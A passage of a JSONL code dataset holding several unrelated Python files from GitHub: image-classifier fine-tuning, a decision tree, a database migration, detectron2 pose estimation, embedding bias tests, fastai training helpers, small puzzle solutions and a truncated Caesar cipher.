150, 3))\r\n# block5_pool (MaxPooling2D) (None, 4, 4, 512) /// last layer \r\n# print(conv_base.summary())\r\nimport os\r\nbase_dir = '/Users/limon/for_saves/catalog_small'\r\ntrain_dir = os.path.join(base_dir, 'train')\r\nvalidation_dir = os.path.join(base_dir, 'validation')\r\ntest_dir = os.path.join(base_dir, 'test')\r\n\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import optimizers\r\n\r\n\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\nconv_base.trainable = True\r\nset_trainable = False\r\nfor layer in conv_base.layers:\r\n if layer.name == 'block5_conv1': # freeze everyth before last layer\r\n set_trainable = True\r\n if set_trainable:\r\n layer.trainable = True\r\n else:\r\n layer.trainable = False\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n\r\nmodel = models.Sequential()\r\nmodel.add(conv_base) #!!!!!!!!\r\nmodel.add(layers.Flatten()) \r\nmodel.add(layers.Dropout(0.5)) \r\nmodel.add(layers.Dense(256, activation='relu'))\r\nmodel.add(layers.Dense(1, activation='sigmoid'))\r\n\r\n\r\n# this way we use the params alike in d_vs_c\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras import optimizers\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n rotation_range=40,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\ntest_datagen=ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator=train_datagen.flow_from_directory(\r\n train_dir,\r\n target_size=(150,150),\r\n batch_size=20,\r\n class_mode='binary')\r\nval_generator=train_datagen.flow_from_directory(\r\n validation_dir,\r\n target_size=(150,150),\r\n batch_size=20,\r\n class_mode='binary')\r\n\r\n\r\nmodel.compile(loss='binary_crossentropy',\r\n optimizer=optimizers.RMSprop(learning_rate=1e-5),\r\n metrics=['acc'])\r\n\r\nhistory = model.fit(\r\n train_generator,\r\n steps_per_epoch=100,\r\n epochs=100,\r\n validation_data=val_generator,\r\n validation_steps=50)\r\n\r\n\r\nmodel.save('cats_and_dogs_small_4.h5')\r\n\r\nimport matplotlib.pyplot as plt \r\n\r\nacc = history.history['acc']\r\nval_acc = history.history['val_acc']\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs = range(len(acc))\r\n\r\n# plt.plot(epochs, acc, 'bo', label='Training acc')\r\n# plt.plot(epochs, val_acc, 'b', label='Validation acc')\r\n# plt.title('Training and validation accuracy')\r\n# plt.legend()\r\n\r\n# plt.figure()\r\n\r\n# plt.plot(epochs, loss, 'bo', label='Training loss')\r\n# plt.plot(epochs, val_loss, 'b', label='Validation loss')\r\n# plt.title('Training and validation loss')\r\n# plt.legend()\r\n\r\n# plt.show()\r\n\r\ndef smooth_curve(points, factor=0.8):\r\n smoothed_points = []\r\n for point in points:\r\n if smoothed_points:\r\n previous = smoothed_points[-1]\r\n smoothed_points.append(previous * factor + point * (1 - factor))\r\n else:\r\n smoothed_points.append(point)\r\n return smoothed_points\r\n\r\nplt.plot(epochs, smooth_curve(acc), 'bo', label='Smoothed training acc')\r\nplt.plot(epochs, smooth_curve(val_acc), 'b', label='Smoothed validation acc')\r\nplt.title('Training and validation accuracy')\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\nplt.plot(epochs,smooth_curve(loss), 'bo', label='Smoothed training loss')\r\nplt.plot(epochs, smooth_curve(val_loss), 'b', label='Smoothed validation loss')\r\nplt.title('Training and validation loss')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n test_dir,\r\n target_size=(150, 150),\r\n batch_size=20,\r\n class_mode='binary')\r\n\r\ntest_loss, test_acc = model.evaluate_generator(test_generator, steps=50)\r\nprint('test acc:', test_acc)","repo_name":"Ivan137950/dogs_vs_cats","sub_path":"fine_tuning.py","file_name":"fine_tuning.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"196363454","text":"#Part 2 (2nd method): Decision Tree for categorical as well as numerical data\n\nimport pandas\nimport numpy\nimport pprint\nfrom numpy import log2 as log\nfrom matplotlib import pyplot as plt\n\ncsv_path = raw_input(\"Enter path to input CSV file: \")\ndataset = pandas.read_csv(csv_path)\n\n#split data into train data and validation data\nsplitted = numpy.split(dataset, [int(.8 * len(dataset.index))])\ndata = splitted[0].reset_index()\nvalidation_data = splitted[1].reset_index()\n\nX = dataset.keys()[[0,1,2,3,4,5,7,8,9]]\nY = 'left'\n\nvi = dataset.keys()[1]\nfiltered = dataset[(dataset[vi] >= 0) & (dataset[vi] < 380)]\nyy = filtered[Y]\nxx = filtered[vi]\n#plt.scatter(xx, yy)\n#plt.show()\n\nx1 ,y1 = numpy.unique(filtered[filtered[Y] == 0][vi], return_counts=True)\nx2 ,y2 = numpy.unique(filtered[filtered[Y] == 1][vi], return_counts=True)\n\nplt.xlabel(vi)\nplt.ylabel('frequency')\nplt.title('Plot for Visualizing splitting points')\nplt.scatter(x1, y1, label='left=0', color='green')\nplt.scatter(x2, y2, label='left=1', color='red')\nplt.legend()\nplt.show()\n\n\ndef Range_set(att):\n #print att\n if att == 'satisfaction_level':\n return [[0,0.0,0.12],[1,0.12,0.36],[2,0.36,0.47],[3,0.47,0.92],[4,0.92,1.1]]\n\n if att == 'last_evaluation':\n return [[0,0.0,0.45],[1,0.45,0.58],[2,0.58,0.77],[3,0.77,1.1]]\n\n if att == 'number_project':\n return [[0,0,3],[1,3,6],[2,6,100]]\n\n if att == 'average_montly_hours':\n return [[0,0,127],[1,127,162],[2,162,217],[3,217,288],[4,288,1000]]\n\n if att == 'time_spend_company':\n return [[0,0,3],[1,3,4],[2,4,5],[3,5,7],[4,7,100]]\n\n\ndef is_categorical(att):\n if att in dataset.keys()[[5,6,7,8,9]]:\n return True\n else:\n return False\n\n\ndef choose_best_attribute(data, x, measure='entropy'):\n if len(x) == 1:\n return x[0]\n\n notLeft_count = len(data[data[Y] == 0])\n left_count = len(data[data[Y] == 1])\n impurity = 0.0\n if left_count == 0 or notLeft_count == 0:\n #in this case entropy_val = 0\n return 'noBest'\n else:\n q = float(left_count) / (left_count + notLeft_count)\n if measure == 'entropy':\n impurity = - ( q*log(q) + (1-q)*log(1-q) )\n if measure == 'gini':\n impurity = 4 * q * (1-q)\n if measure == 'misclassification':\n impurity = 2 * min(q, 1-q)\n\n max_info_gain = float(-99999999999)\n\n for att in x:\n impurity_split = 0.0\n\n if is_categorical(att):\n attValue = numpy.unique(data[att])\n for value in attValue:\n subdata = data[data[att] == value]\n notLeft_count_split = len(subdata[subdata[Y] == 0])\n left_count_split = len(subdata[subdata[Y] == 1])\n\n if left_count_split == 0 or notLeft_count_split == 0:\n #in this case entropy_split_val = 0\n continue\n else:\n q = float(left_count_split) / (left_count_split + notLeft_count_split)\n\n if measure == 'entropy':\n impurity_split_val = - ( q*log(q) + (1-q)*log(1-q) )\n if measure == 'gini':\n impurity_split_val = 4 * q * (1-q)\n if measure == 'misclassification':\n impurity_split_val = 2 * min(q, 1-q)\n\n weight = float( len(subdata.index) ) / len(data.index)\n\n impurity_split += weight * impurity_split_val\n\n else:\n for Range in Range_set(att):\n subdata = data[(data[att] >= Range[1]) & (data[att] < Range[2])]\n notLeft_count_split = len(subdata[subdata[Y] == 0])\n left_count_split = len(subdata[subdata[Y] == 1])\n\n if left_count_split == 0 or notLeft_count_split == 0:\n #in this case entropy_split_val = 0\n continue\n else:\n q = float(left_count_split) / (left_count_split + notLeft_count_split)\n\n if measure == 'entropy':\n impurity_split_val = - ( q*log(q) + (1-q)*log(1-q) )\n if measure == 'gini':\n impurity_split_val = 4 * q * (1-q) #scaled to [0,1]\n if measure == 'misclassification':\n impurity_split_val = 2 * min(q, 1-q) #scaled to [0,1]\n\n weight = float( len(subdata.index) ) / len(data.index)\n\n impurity_split += weight * impurity_split_val\n\n #print entropy_split, att\n info_gain = impurity - impurity_split\n #print info_gain, att\n if info_gain > max_info_gain:\n max_info_gain = info_gain\n bestAtt = att\n\n #print \"\"\n\n if max_info_gain <= 0:\n return 'noBest'\n\n #print \"\"\n #print max_info_gain, bestAtt\n #print \"\"\n return bestAtt\n\n\ndef check_purity(y, measure = 'entropy'):\n left_count = 0\n notLeft_count = 0\n\n for value in y:\n if value == 1:\n left_count = left_count + 1\n else:\n notLeft_count = notLeft_count + 1\n\n if notLeft_count == 0 and notLeft_count == 0:\n #in this case we return 1 as majority because we want high recall\n return 1, 1\n elif left_count == 0:\n return 1, 0\n elif notLeft_count == 0:\n return 1, 1\n\n impurity = 0.0\n q = float(left_count) / (left_count + notLeft_count)\n\n if measure == 'entropy':\n impurity = - ( q*log(q) + (1-q)*log(1-q) )\n if measure == 'gini':\n impurity = 4 * q * (1-q)\n if measure == 'misclassification':\n impurity = 2 * min(q, 1-q)\n\n purity = 1 - impurity\n #print purity\n\n if left_count > notLeft_count:\n return purity, 1\n\n else:\n return purity, 0\n\n\ndef build_decision_tree(data, x, measure = 'entropy', tree = None):\n\n #if pure enough\n purity, majority = check_purity(data[Y], measure)\n #print purity, majority\n if purity > 0.65: #gini:0.75, mis:0.85\n return majority\n\n #get an attribute with maximum information gain\n bestAtt = choose_best_attribute(data, x, measure)\n if bestAtt == 'noBest':\n return majority\n\n if tree == None:\n tree = {}\n tree[bestAtt] = {}\n\n if is_categorical(bestAtt):\n #for all categorical values keep growing tree\n attValue = numpy.unique(dataset[bestAtt])\n for value in attValue:\n subdata = data[data[bestAtt] == value]\n #if len(x) == 1:\n # tree[bestAtt][value] = majority\n #else:\n tree[bestAtt][value] = build_decision_tree(subdata, x.drop(bestAtt), measure) #Calling the function recursively\n\n else:\n #divide the numerical data in specified range(s)\n #print Range_set(bestAtt)\n for Range in Range_set(bestAtt):\n subdata = data[(data[bestAtt] >= Range[1]) & (data[bestAtt] < Range[2])]\n #if len(x) == 1:\n # tree[bestAtt][Range[0]] = majority\n #else:\n tree[bestAtt][Range[0]] = build_decision_tree(subdata, x.drop(bestAtt), measure)\n\n return tree\n\n#print type(X)\ndecision_tree = build_decision_tree(data, X)\n#pprint.pprint(decision_tree)\n\ndef predict(inst,tree):\n for nodes in tree.keys():\n value = inst[nodes]\n value = value.tolist()\n value = value[0]\n #print nodes\n if not is_categorical(nodes):\n ranges = Range_set(nodes)\n for i in range(len(ranges)):\n if value >= ranges[i][1] and value < ranges[i][2]:\n value = i\n #print nodes, value\n tree = tree[nodes][value]\n prediction = 0\n\n if type(tree) is dict:\n prediction = predict(inst, tree)\n else:\n prediction = tree\n break;\n\n return prediction\n\n\ndef calculate_performance(validation_data):\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n\n for i in range(len(validation_data.index)):\n row = validation_data.iloc[[i]][Y]\n row = row.tolist()\n row = row[0]\n if predict(validation_data.iloc[[i]], decision_tree) == 1:\n if row == 1:\n TP += 1\n else:\n FP += 1\n else:\n if row == 0:\n TN += 1\n else:\n FN += 1\n\n accuracy = float(TP + TN) / (TP + TN + FP + FN)\n\n if TP + FP == 0:\n precision = 0\n else:\n precision = float(TP) / (TP + FP)\n\n if TP + FN == 0:\n recall = 0\n else:\n recall = float(TP) / (TP + FN)\n\n F1measure = 2.0 / ( (1/recall) + (1/precision) )\n\n print (\"accuracy =\", accuracy)\n print (\"precision =\", precision)\n print (\"recall =\", recall)\n print (\"F1 measure =\", F1measure)\n\ncalculate_performance(validation_data)\n\n\ndef predict_test(test_set, tree):\n print (\"\\nPredictions:\")\n for i in range(len(test_set.index)):\n print (predict(test_set.iloc[[i]], tree))\n\ndo_test = raw_input(\"\\nProvide test data? (y/n): \")\n\nif do_test == 'y' or do_test == 'Y':\n csv_path = raw_input(\"Enter path to test CSV file: \")\n test_set = pandas.read_csv(csv_path)\n\n predict_test(test_set, decision_tree)\n","repo_name":"devesh-tewari/DecisionTree","sub_path":"q-1-2(method 2).py","file_name":"q-1-2(method 2).py","file_ext":"py","file_size_in_byte":9136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32239721467","text":"\"\"\"empty message\n\nRevision ID: caced45ad29b\nRevises: \nCreate Date: 2018-08-20 00:10:08.543429\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'caced45ad29b'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('psn_category_quick')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('psn_category_quick',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('category_url', sa.VARCHAR(), autoincrement=False, nullable=True),\n sa.Column('category_name', sa.VARCHAR(), autoincrement=False, nullable=True),\n sa.Column('gameItem', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('id', name='psn_category_quick_pkey')\n )\n # ### end Alembic commands ###\n","repo_name":"swnoh/psn-price-tracker","sub_path":"server/migrations/versions/caced45ad29b_.py","file_name":"caced45ad29b_.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"40679182269","text":"# This file is part of to-share.\n\n# to-share is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# Foobar is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with Foobar. If not, see .\n\nimport os\nfrom os import path\nimport shutil\nimport argparse\nimport numpy as np\nimport cv2\nimport subprocess as sp\nimport detectron2\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\n\ndef get_parser():\n\tparser = argparse.ArgumentParser(description=\"\")\n\tparser.add_argument(\"--overwrite\", action=\"store_true\", help=\"Overwrite existing 2D estimations on sequence level.\")\n\treturn parser\n\n\ndef get_img_paths(imgs_dir):\n\timg_paths = []\n\tfor dirpath, dirnames, filenames in os.walk(imgs_dir):\n\t\tfor filename in [f for f in filenames if f.endswith('.png') or f.endswith('.PNG') or f.endswith('.jpg') or f.endswith('.JPG') or f.endswith('.jpeg') or f.endswith('.JPEG')]:\n\t\t\timg_paths.append(os.path.join(dirpath,filename))\n\timg_paths.sort()\n\n\treturn img_paths\n\ndef read_images(dir_path):\n\timg_paths = get_img_paths(dir_path)\n\tfor path in img_paths:\n\t\tyield cv2.imread(path)\n\n\ndef get_resolution(filename):\n command = ['ffprobe', '-v', 'error', '-select_streams', 'v:0',\n '-show_entries', 'stream=width,height', '-of', 'csv=p=0', filename]\n pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=-1)\n for line in pipe.stdout:\n w, h = line.decode().strip().split(',')\n return int(w), int(h)\n\n\ndef read_video(filename):\n w, h = get_resolution(filename)\n\n command = ['ffmpeg',\n '-i', filename,\n '-f', 'image2pipe',\n '-pix_fmt', 'bgr24',\n '-vsync', '0',\n\t\t\t'-loglevel', '16',\n '-vcodec', 'rawvideo', '-']\n\n pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=-1)\n while True:\n data = pipe.stdout.read(w*h*3)\n if not data:\n break\n yield np.frombuffer(data, dtype='uint8').reshape((h, w, 3))\n\n\ndef init_pose_predictor(config_path, weights_path, cuda=True):\n\tcfg = get_cfg()\n\tcfg.merge_from_file(config_path)\n\tcfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set threshold for this model\n\tcfg.MODEL.WEIGHTS = weights_path\n\tif cuda == False:\n\t\tcfg.MODEL.DEVICE='cpu'\n\tpredictor = DefaultPredictor(cfg)\n\n\treturn predictor\n\n\ndef encode_for_videpose3d(boxes,keypoints,resolution, dataset_name):\n\t# Generate metadata:\n\tmetadata = {}\n\tmetadata['layout_name'] = 'coco'\n\tmetadata['num_joints'] = 17\n\tmetadata['keypoints_symmetry'] = [[1, 3, 5, 7, 9, 11, 13, 15], [2, 4, 6, 8, 10, 12, 14, 16]]\n\tmetadata['video_metadata'] = {dataset_name: resolution}\n\n\tprepared_boxes = []\n\tprepared_keypoints = []\n\tfor i in range(len(boxes)):\n\t\tif len(boxes[i]) == 0 or len(keypoints[i]) == 0:\n\t\t\t# No bbox/keypoints detected for this frame -> will be interpolated\n\t\t\tprepared_boxes.append(np.full(4, np.nan, dtype=np.float32)) # 4 bounding box coordinates\n\t\t\tprepared_keypoints.append(np.full((17, 4), np.nan, dtype=np.float32)) # 17 COCO keypoints\n\t\t\tcontinue\n\n\t\tprepared_boxes.append(boxes[i])\n\t\tprepared_keypoints.append(keypoints[i][:,:2])\n\n\tboxes = np.array(prepared_boxes, dtype=np.float32)\n\tkeypoints = np.array(prepared_keypoints, dtype=np.float32)\n\tkeypoints = keypoints[:, :, :2] # Extract (x, y)\n\n\t# Fix missing bboxes/keypoints by linear interpolation\n\tmask = ~np.isnan(boxes[:, 0])\n\tindices = np.arange(len(boxes))\n\tfor i in range(4):\n\t\tboxes[:, i] = np.interp(indices, indices[mask], boxes[mask, i])\n\tfor i in range(17):\n\t\tfor j in range(2):\n\t\t\tkeypoints[:, i, j] = np.interp(indices, indices[mask], keypoints[mask, i, j])\n\n\tprint('{} total frames processed'.format(len(boxes)))\n\tprint('{} frames were interpolated'.format(np.sum(~mask)))\n\tprint('----------')\n\n\treturn [{\n\t\t'start_frame': 0, # Inclusive\n\t\t'end_frame': len(keypoints), # Exclusive\n\t\t'bounding_boxes': boxes,\n\t\t'keypoints': keypoints,\n\t}], metadata\n\n\ndef predict_pose(pose_predictor, img_generator, output_path, dataset_name='detectron2'):\n\t'''\n\t\tpose_predictor: The detectron's pose predictor\n\t\timg_generator: Images source\n\t\toutput_path: The path where the result will be saved in .npz format\n\t'''\n\tboxes = []\n\tkeypoints = []\n\tresolution = None\n\n\tprint ('Predicting pose in frame:')\n\n\t# Predict poses:\n\tfor i, img in enumerate(img_generator):\n\t\tpose_output = pose_predictor(img)\n\n\t\tif len(pose_output[\"instances\"].pred_boxes.tensor) > 0:\n\t\t\tcls_boxes = pose_output[\"instances\"].pred_boxes.tensor[0].cpu().numpy()\n\t\t\tcls_keyps = pose_output[\"instances\"].pred_keypoints[0].cpu().numpy()\n\t\telse:\n\t\t\tcls_boxes = np.full((4,), np.nan, dtype=np.float32)\n\t\t\tcls_keyps = np.full((17,3), np.nan, dtype=np.float32) # nan for images that do not contain human\n\n\t\tboxes.append(cls_boxes)\n\t\tkeypoints.append(cls_keyps)\n\n\t\t# Set metadata:\n\t\tif resolution is None:\n\t\t\tresolution = {\n\t\t\t\t'w': img.shape[1],\n\t\t\t\t'h': img.shape[0],\n\t\t\t}\n\n\n\t\tprint('{} '.format(i+1), end='\\r')\n\n\t# Encode data in VidePose3d format and save it as a compressed numpy (.npz):\n\tdata, metadata = encode_for_videpose3d(boxes, keypoints, resolution, dataset_name)\n\toutput = {}\n\toutput[dataset_name] = {}\n\toutput[dataset_name]['custom'] = [data[0]['keypoints'].astype('float32')]\n\tnp.savez_compressed(output_path, positions_2d=output, metadata=metadata)\n\n\tprint ('All done!')\n\ndef run_internal_script(basedir, folder):\n\t# Predict poses and save the result:\n\tprint('Predicting 2D pose in ', basedir + '/' + folder + '/input.mp4')\n\timg_generator = read_video(basedir + '/' + folder + '/input.mp4') # or get them from a video\n\toutput_path = basedir + '/' + folder + '/pose2d'\n\tpredict_pose(pose_predictor, img_generator, output_path)\n\n\n\nif __name__ == '__main__':\n\tprint(\"==========================================================\")\n\tprint(\"to-share::detector\")\n\tprint(\"==========================================================\")\n\t# Init pose predictor:\n\n\tmodel_config_path = 'detectron2/configs/COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x.yaml'\n\tmodel_weights_path = 'detectron2://COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x/139686956/model_final_5ad38f.pkl'\n\n\tpose_predictor = init_pose_predictor(model_config_path, model_weights_path, cuda=True)\n\n\targs = get_parser().parse_args()\n\n\tbasedir = '../data/train/video/deep-dance'\n\tfor video_folder in os.listdir(basedir):\n\t\tif os.path.isdir(basedir + '/' + video_folder):\n\t\t\tprint('\\n')\n\t\t\tprint('Predicting 2D poses for videos in folder \\\"' + video_folder + '\\\"...')\n\t\t\tprint(\"----------------------------------------------------------\")\n\t\t\tfor folder in os.listdir(basedir + '/' + video_folder):\n\t\t\t\tpose2d_numpy = basedir + '/' + video_folder + '/' + folder + '/pose2d.npz'\n\t\t\t\tif path.isfile(pose2d_numpy):\n\t\t\t\t\tprint(\"2D pose estimation export (numpy) found.\")\n\t\t\t\t\tif args.overwrite:\n\t\t\t\t\t\tprint(\"Flag detected. Overwriting...\")\n\t\t\t\t\t\trun_internal_script(basedir, video_folder + '/' + folder)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Skipping.\")\n\t\t\t\telse:\n\t\t\t\t\trun_internal_script(basedir, video_folder +'/' + folder)\n","repo_name":"deep-dance/core","sub_path":"detector/predict_2d_pose.py","file_name":"predict_2d_pose.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23557620161","text":"#Python 3.6\r\n#Jeremiah Gastilo\r\n\r\nt = int(input()) # read a line with a single integer\r\nfor i in range(1, t + 1):\r\n n = input() # read a list of integers, 2 in this case\r\n for x in range(1, len(n)):\r\n if n[-x] < n[-(x+1)]:\r\n n = str(int(n)-(int(n[-x:])+1))\r\n print(\"Case #{}: {}\".format(i, n))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3112.py","file_name":"3112.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34665361782","text":"# Jelle Bosscher - UvA 2020\n# jellebosscher@gmail.com\n\n# utils for POAT/WEAT\nfrom pos_op_weat import *\nfrom pos_op import *\n\ndef weat_iat_pos_op(data, X, Y, A, B, iterations=100000, POAT=True, measure=K_E):\n \"\"\"\n Runs the POAT (or WEAT) on one experiment.\n Input: data - POAT=True: positive operators (NxN np.array),\n POAT=False: word vectors (Nx1 np.array)\n X, Y, A, B - two sets of target words and two sets of attribute words.\n iterations - amount of iterations to estimate the likelihood of the effect_size\n POAT=True - use positive operators (POAT) or word embeddings (WEAT),\n measure - applies to positive operators only, define measure of graded hyponymy\n \"\"\"\n dist = nullDistribution(data, X, Y, A, B, iterations, POAT, measure)\n test_stat, effect_size = diff_weat_ass_K_E(data, X, Y, A, B, measure)\n pvalue = calc_cumulative_prob(dist, test_stat)\n\n print(\"#{}\".format(\"-\"*75))\n print(f\"{'|':>37} effect_size: {effect_size}\\r| test_stat: {test_stat}\")\n print(f\"{'|':>37} exponent: {np.floor(np.log10(np.abs(pvalue))+1.)}\\r| pvalue: {pvalue}\")\n print(\"#{}\".format(\"-\"*75))\n print()\n return dist, test_stat, effect_size, pvalue\n\ndef load_embeddings(filename):\n \"\"\"\n Import embddings from a text file line by line. Store the vector for each words in a dictionary.\n \"\"\"\n embeddings = dict()\n print(\"Loading embeddings...\")\n with open(filename, 'r', encoding=\"utf-8\") as f:\n for line in f:\n values = line.split()\n word = values[0]\n if word == '.':\n continue\n try:\n vector = np.asarray(values[1:], \"float32\")\n except ValueError:\n pass\n embeddings[word] = vector\n print(\"Done\\n\")\n return embeddings\n\ndef construct_model(embeddings, directory, POAT=True):\n \"\"\"\n Read all words from every experiment file and build the model using only those words.\n Input: embeddings, directory, POAT (dict, path_to_folder, boolean (POAT vs WEAT))\n \"\"\"\n input_words = []\n for filename in os.listdir(directory):\n with open(directory + filename, 'r') as f:\n for line in f:\n input_words.append(line.strip().split(', '))\n all_words = set([x for test in input_words for x in test[1:]])\n\n print(\"Construction model: pos_op or vec...\")\n\n data = dict()\n\n for word in all_words:\n if POAT:\n data[word] = pos_op(embeddings, word)\n else:\n data[word] = embedding[word]\n\n print(\"Done\\n\")\n return data\n","repo_name":"jellebosscher/POAT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8995415389","text":"from logger import logger\nimport numpy as np\nimport torch\nfrom fastai.callbacks import TrainingPhase, GeneralScheduler, SaveModelCallback, EarlyStoppingCallback\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef save_model_without_embedding(model, model_name):\n logger.info(\"saving model in {}\".format(model_name))\n temp_dict = model.state_dict()\n del temp_dict['embedding.weight']\n torch.save(temp_dict, model_name)\n\n\ndef moving_average(net1, net2, alpha=1):\n for param1, param2 in zip(net1.parameters(), net2.parameters()):\n param1.data *= (1.0 - alpha)\n param1.data += param2.data * alpha\n\n\ndef predict(test, learner, batch_size, output_dim):\n learner.model.eval()\n with torch.no_grad():\n test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n test_preds = np.zeros((len(test), output_dim))\n for i, x_batch in enumerate(test_loader):\n x = x_batch[0].cuda()\n x_features = x_batch[1].cuda()\n y_pred = sigmoid(learner.model(x, x_features).detach().cpu().numpy())\n test_preds[i * batch_size:(i+1) * batch_size, :] = y_pred\n return test_preds\n\n\ndef predict_with_model(test, model, batch_size, output_dim):\n model.eval()\n with torch.no_grad():\n test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n test_preds = np.zeros((len(test), output_dim))\n for i, x_batch in enumerate(test_loader):\n x = x_batch[0]\n x_features = x_batch[1]\n y_pred = sigmoid(model(x, x_features).detach().cpu().numpy())\n test_preds[i * batch_size:(i+1) * batch_size, :] = y_pred\n return test_preds\n\n\ndef train_model(learn, lr=0.001, lr_decay=0.8, batch_size=512, n_epochs=20, model_name='fastai_'):\n n = len(learn.data.train_dl)\n phases = [(TrainingPhase(n).schedule_hp('lr', lr * (lr_decay ** (i)))) for i in range(n_epochs)]\n sched = GeneralScheduler(learn, phases)\n learn.callbacks.append(sched)\n\n learn.fit(n_epochs,\n callbacks=[SaveModelCallback(learn, name=model_name),\n EarlyStoppingCallback(learn, min_delta=0.001, patience=5)])\n\n\ndef train_model_per_epoch(learn, test, output_dim, model_idx, lr=0.001, lr_decay=0.6, batch_size=512, n_epochs=20,\n early_stopping=5, save_models='all', model_name='fastai_'):\n all_test_preds = []\n best_loss = -1\n best_epoch = 1\n for epoch in range(n_epochs):\n\n learn.fit(1, lr=lr * (lr_decay ** epoch))\n\n current_val_loss = learn.recorder.val_losses[0]\n test_preds = predict(test, learn, batch_size=256, output_dim=output_dim)\n all_test_preds.append(test_preds)\n if save_models == 'all':\n save_model_without_embedding(learn.model, model_name + str(model_idx * n_epochs + epoch) + \".pt\")\n if best_loss == -1 or current_val_loss < best_loss:\n best_epoch = epoch\n best_loss = current_val_loss\n else:\n if epoch - best_epoch == early_stopping:\n break\n\n logger.info(\"best epoch: {}, best loss: {:4.5f}\".format(best_epoch, best_loss))\n\n if save_models == 'last':\n save_model_without_embedding(learn.model, model_name + str(model_idx * n_epochs + epoch) + \".pt\")\n return all_test_preds\n","repo_name":"nyounes/kaggle","sub_path":"jigsaw/model_tools.py","file_name":"model_tools.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35863008901","text":"class Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n total = 0\n\n for (boxes, items) in sorted(boxTypes, key=lambda bt: bt[1], reverse=True):\n total += items * min(boxes, truckSize)\n truckSize -= min(boxes, truckSize)\n\n if truckSize == 0:\n break\n\n return total\n","repo_name":"pbelskiy/contest","sub_path":"leetcode.com/1710_maximum_units_on_a_truck/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16762080294","text":"# NOTE - My Caesar Cipher\n# To encode user's message, shift right n positions in the alphabet, looping around\n# To decode user's message, shift left n positions in the alphabet, looping around\n# I'll challenge myself to use a single alphabet list\n\nimport os\nimport caesar_art\n\n\n# Set up our alphabet list.\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\n# Initialize the game with title screen\ndef gamestart():\n os.system('clear')\n print(caesar_art.logo)\n print()\n\n\ndef userinput():\n input_choice = \"\"\n while input_choice != \"E\" and input_choice != \"D\":\n input_choice = input(\"Would you like to [E]ncode or [D]ecode your message? \")\n input_message = input(\"Please enter the message: \\n\")\n input_shift = input(\"Please enter the shift amount: \")\n return input_choice, input_message, input_shift\n\n\ndef cipher():\n continue_game = True\n while continue_game:\n choice, message, shift = userinput()\n\n final_text = \"\"\n for character in message:\n is_alpha = character.isalpha()\n is_upper = character.isupper()\n character = character.lower()\n char_shift = int(shift)\n if not is_alpha:\n final_text += character\n elif choice == \"E\":\n position = alphabet.index(character)\n if position + char_shift > 25:\n char_shift = 